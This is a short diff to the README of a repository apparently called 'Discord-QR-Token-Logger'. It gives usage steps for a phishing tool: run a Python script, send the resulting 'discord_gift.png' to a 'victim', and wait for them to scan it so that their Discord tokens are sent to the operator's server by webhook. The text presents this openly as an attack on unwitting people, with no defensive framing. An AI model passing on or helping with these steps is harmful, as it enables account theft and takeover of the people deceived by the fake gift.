9P9/Discord-QR-Token-Logger/README.md

 ```
 python3 QR*
 ```
-Last Step, Send discord_gift.png To Victim And Wait For Him To Scan The Image.Boom!
+Last Step, Send discord_gift.png You Generated Just Now To Victim And Wait For Him To Scan The Image.Boom!
 His Tokens Will Send To Your Server By Webhook